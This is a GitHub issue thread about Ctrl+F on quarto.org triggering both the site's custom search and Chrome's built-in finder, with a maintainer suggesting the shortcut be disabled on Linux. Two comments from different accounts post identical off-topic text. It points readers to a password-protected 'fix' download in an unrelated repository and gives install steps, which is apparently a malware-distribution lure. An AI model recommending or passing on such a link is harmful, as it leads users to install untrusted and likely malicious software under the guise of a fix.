### ISSUE TITLE
Ctrl+F opens both the custom finder and chrome's finder

### ISSUE THREAD

**Issue by gcgbarbosa** [quarto-dev/quarto-cli#10636]
### What would you like to do?

Report an issue on quarto.org

### Description

![20240828215018479076157](https://github.com/user-attachments/assets/17dbe5cc-dacf-410b-931f-4a0d787ce372)

if this is the intended behavior, please ignore.

**Comment by Amrithesh-k** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by dionathanfreitas** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by cscheid** [comment]
I don't think we can disable the built-in search bar from showing up, so we might need to disable `ctrl-f` as a shortcut on Linux.

(This doesn't happen on macOS where the built-in search bar shortcut is cmd-F)
